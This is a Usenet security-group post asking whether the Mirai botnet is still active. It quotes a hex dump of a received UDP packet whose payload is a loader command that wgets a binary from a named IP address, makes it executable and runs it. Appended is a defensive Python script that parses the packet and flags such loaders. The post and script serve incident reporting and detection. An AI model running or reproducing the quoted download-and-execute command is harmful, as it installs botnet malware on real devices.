Subject: Mirai botnet
From: Marc SCHAEFER
Newsgroups: rocksolid.shared.security
Organization: Posted through news.alphanet.ch
Date: Sat, 4 Feb 2023 16:18 UTC
Message-ID: <trm0gu$6n4$1@shakotay.alphanet.ch>

Hello,

is the Mirai botnet still active?

I got a few datagrams like this lately (dest address anonymized)

09:27:22.916608 IP (tos 0x0, ttl 245, id 54321, offset 0, flags [none], proto UDP (17), length 136)
107.189.12.152.47159 > 1.2.3.4.9034: [no cksum] UDP, length 108
0x0000: 4500 0088 d431 0000 f511 0176 6bbd 0c98 E....1.....vk...
0x0010: 0102 0304 b837 234a 0074 0000 6f72 663b .....7#J.t..orf;
0x0020: 6364 202f 746d 703b 2072 6d20 2d72 6620 cd./tmp;.rm.-rf.
0x0030: 6d70 736c 3b20 2f62 696e 2f62 7573 7962 mpsl;./bin/busyb
0x0040: 6f78 2077 6765 7420 6874 7470 3a2f 2f31 ox.wget.http://1
0x0050: 3034 2e32 3434 2e37 322e 382f 6875 616d 04.244.72.8/huam
0x0060: 7073 6c3b 2063 686d 6f64 202b 7820 6875 psl;.chmod.+x.hu
0x0070: 616d 7073 6c3b 202e 2f68 7561 6d70 736c ampsl;../huampsl
0x0080: 206d 7073 6c3b 2023 .mpsl;.#

Shall I assume that:

- 107.189.12.152 is probably spoofed, because UDP, and so I should
not report it?

- 104.224.72.8 should be reported, especially since it really hosts
the URL http://104.224.72.8/huamsl and after manual download, this
is seen as Mirai by an online virus detector?

Is it the real Mirai, and do you also see attempts like this, or is
it maybe a targeted attack?

--
Attention: keep the number of quoted lines to the essential, otherwise
I will not see your reply. And if you frequently write nonsense, I will
stop reading you and will recommend (NoCeM) that others stop reading you too.
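As an added example (not part of the post above), a small Python triage script that reassembles the quoted tcpdump -X dump from its hex columns, splits out the IPv4/UDP fields, flags the busybox wget / chmod +x / execute sequence, and keeps the unverifiable UDP source address separate from the host that actually has to serve the file; the embedded sample is the dump quoted above, and the function names are my own.

```python
import re
import struct
from ipaddress import IPv4Address

# Constructed sample: the tcpdump -X dump quoted in the post (dst already anonymized).
SAMPLE_DUMP = """\
0x0000: 4500 0088 d431 0000 f511 0176 6bbd 0c98 E....1.....vk...
0x0010: 0102 0304 b837 234a 0074 0000 6f72 663b .....7#J.t..orf;
0x0020: 6364 202f 746d 703b 2072 6d20 2d72 6620 cd./tmp;.rm.-rf.
0x0030: 6d70 736c 3b20 2f62 696e 2f62 7573 7962 mpsl;./bin/busyb
0x0040: 6f78 2077 6765 7420 6874 7470 3a2f 2f31 ox.wget.http://1
0x0050: 3034 2e32 3434 2e37 322e 382f 6875 616d 04.244.72.8/huam
0x0060: 7073 6c3b 2063 686d 6f64 202b 7820 6875 psl;.chmod.+x.hu
0x0070: 616d 7073 6c3b 202e 2f68 7561 6d70 736c ampsl;../huampsl
0x0080: 206d 7073 6c3b 2023 .mpsl;.#
"""
HEX_GROUPS = re.compile(r"^\s*0x[0-9a-f]+:((?:\s+[0-9a-f]{4}){1,8})", re.I)
LOADER_URL = re.compile(r"\b(?:wget|tftp|curl)\b[^;]*?(https?://[^\s;'\"]+)")

def dump_to_bytes(dump: str) -> bytes:
    """Reassemble the packet from the hex columns; the ASCII column is ignored."""
    raw = b"".join(bytes.fromhex(m.group(1))
                   for m in map(HEX_GROUPS.match, dump.splitlines()) if m)
    # Cut at the IPv4 total-length field, which also drops any ASCII-column
    # token on the last line that happened to look like a 4-digit hex group.
    return raw[: struct.unpack("!H", raw[2:4])[0]]

def parse_udp(packet: bytes) -> dict:
    """Split an IPv4/UDP packet into addresses, ports and payload."""
    if packet[0] >> 4 != 4 or packet[9] != 17:
        raise ValueError("not an IPv4/UDP packet")
    ihl = (packet[0] & 0x0F) * 4
    sport, dport, ulen = struct.unpack("!HHH", packet[ihl:ihl + 6])
    return {"src": str(IPv4Address(packet[12:16])), "dst": str(IPv4Address(packet[16:20])),
            "sport": sport, "dport": dport, "payload": packet[ihl + 8:ihl + ulen]}

def triage(dump: str) -> dict:
    """Flag a Mirai-style download-and-execute loader and separate the two addresses."""
    pkt = parse_udp(dump_to_bytes(dump))
    cmd = pkt["payload"].decode("ascii", errors="replace")
    url = LOADER_URL.search(cmd)
    return {
        # UDP needs no handshake, so the sender address cannot be trusted.
        "unverified_source": pkt["src"],
        "dst_port": pkt["dport"],
        "is_loader": bool(url) and "chmod +x" in cmd and "./" in cmd,
        # The download host, by contrast, must really be reachable to serve the binary.
        "payload_host": url.group(1).split("/")[2] if url else None,
        "command": cmd,
    }
```

The host it reports is taken from the payload bytes themselves, which is the value to compare against any hand-typed transcription before reporting.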
